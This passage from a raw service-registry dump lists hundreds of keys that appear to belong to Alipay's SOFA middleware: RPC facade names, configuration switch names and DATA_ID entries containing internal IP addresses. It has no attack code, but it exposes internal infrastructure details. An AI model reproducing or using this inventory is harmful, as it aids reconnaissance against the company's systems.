plateRelationSitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaappdist.common.service.facade.bootwizard.BootWizardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.adame.AdameModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AcctransqueryCacheConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetlibview.facade.api.AssetLibItemOverviewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.echox.drm.EchoxSpecialDrm.updateEchoxConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.query.FundBankTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.168.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","finsteward@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.180.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramOperateLog@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.secretary.manager.WorkAssistantProjectManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cardcenter.facade.CardBinQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.biz.promo.assist.rpc.PromotionInfoQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.TwoPhaseFundBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:defincustomer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestEnableSample,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.12.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.promoplatform.common.service.facade.spi.PromoPlatFormTaskService:1.0:SJYS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insautomarket.common.facade.allocation.AutoMktResourceAllocationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspricecore.common.service.facade.InsPriceCoreManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:ssss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-inslifeprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@admgr#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.etetestcore.service.api.finpwm.FinpwmCapitalPlanManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.tradepush.facade.TradePushInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdmng.common.service.facade.DrmOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.UserAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accustomerweb.common.service.facade.MemberManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:omoaidbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.clvuser.ClvUserService:1.0:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:timeout@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.ruleroute.RuleRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cdl.digital.logistic.business.rpc.DLBusinessOpRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dcepcore.service.QueryWalletServiceLdc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.features,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundRankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fixasds.api.SimulationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.ARPartyQueryFacade:1.0:aRPartyQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.UcdpMaterialPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.YebTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwjdkvii@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtmp.common.service.facade.QueryUserInfoByDomainNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.AntPassportSwitcher.antPassportMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.platform.facade.baseline.BaselinePageListApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.arcore.common.service.facade.ArOperateStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csrobot.service.facade.mng.api.CheckOrderMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.common.service.account.close.CloseAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.107.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promobatch.common.service.task.facade.CallbackLogManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.MerchantNameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.parentchildmodel.api.PcmtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finpwm.finpwmXTradeSlaveDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csconfig.service.facade.api.TreeQueryService:1.0:merchantService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.transfer.TransferOrderLogManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.marketing.FinFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.common.service.storage.DataRepositoryService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.depositback.api.ManageDepositbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MerchantGroupNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fopSiteProcessCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-S-MOBILEAPP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialportal.web.task.rpc.facade.TaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.arFeeVoNotDealPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.leads.SalesShopLeadsManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.ToolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.prodTransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.update.InfrastructureInfoUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractCoordinatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zcache.tbase.RCacheServerTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.242.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscene.common.service.facade.api.StrategyQueryFacade:1.0:finscene-surege@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.CloudAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.MigrationOauthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkriskoperation_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.DetectTaskOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.secret.SecuritySecretKeyService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinTntbatchDbQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillUserProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.InvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.item.KbSingleItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.reDeclareMinDuration,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm74#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.116.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.core.service.template.TemplateQuickSummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forum.api.mesadata.SecuForumMesaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.ExplorerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.InsureOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.fundreport.facade.InvestOpinionFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AssetClaimApplyRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.common.BizTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.fundRedeemMaxRetryCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_acordercore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promomng.biz.promoworkbench.MarketingPlanListManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.failover.component.service.facade.FailoverFacade:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SmartContractGenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compcore.common.service.facade.ai.picture.PictureAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zskynet.zdalExplorerDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.outbound.facade.OutboundAiTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.thanks.api.InsThanksEvaluationClaimFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcube.common.service.facade.page.AppBaseConfigIotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.30.192.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developertool.facade.channel.TrProcessor:1.0:ai_solution@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpartner.service.facade.RigelUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.auth.facade.AuthUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.drc.rm.endpoint.operation.facade.OperationStoreFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_HSF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.insuredIndexSpNoStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.platform.AppAdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.voucher.api.VoucherBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.59.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecsign.common.service.facade.solution.SolutionTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:appxprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.awatch.sdk.web.RuleService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:overseaexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.amlfeature.AmlFeatureCalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openbizmock.module.prpe.service.PrpeManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_LEIYING_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frgcenter.common.service.facade.api.BizFlowServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdopunit.facade.api.imdb.ImdbRiskService:1.0:imdb_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recproxy.common.service.facade.api.ContentRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.manage.facade.RouteTryFacade:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifecustprod.common.service.facade.following.FollowingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promocenter.common.manage.facade.api.solution.XcodeProcessorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.biz.shared.AiceTaskManger:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.17.0.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.SendTbMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.FlowScaleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.mng.facade.ContentMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientPerfDiagnoseDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.24.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.ptcore.common.service.facade.api.ptemplate.ProductTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:activeUser@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.net.FaNetAssetTransConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insliveprod.common.service.facade.ProgramMgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.task.DataProcessTaskService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.processmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.defaultTairExpires,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.admin.service.OperateRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountTransPaymentFinalizer:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intentionservice.common.facade.IntentionInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.bizindicator.BizKeyIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instbizlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.manage.facade.api.ItemSecMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.material.MaterialFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.riskprofile.RiskProfileTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsIOTDeviceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.allItaskScene,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imtmsvcprod.common.service.facade.dapply.ReassignReactDeliveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_BIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_argmtRateAjustCertCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.KmiQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zpublishuiweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_RQ_Notify_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:domino-previewer-page@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.PromoBenefitRecmdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrcpstorm.common.service.facade.CrowdAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.ProductAbilityInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.appxcore.common.service.facade.api.view.ViewMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.internLanguage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.integration.user.UniQueryServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.WithholdOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.settlecore.service.facade.BankAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.template.ViewTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.api.UserLabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:workOrderCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.v2.ApplicationPackingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.109.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRolePrincipalRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.InternalNameListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:openitemcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:twa-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_HELMETCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.FixedPeriodTradeOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.ZCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.SecureQaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.proxyadapt.api.RemoteInvokerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcommonweal.common.service.facade.api.AcwMerchantProtocolFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.alarm.api.AlarmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskx.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.UnifiedMobileContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:compile-cache-isolate-off@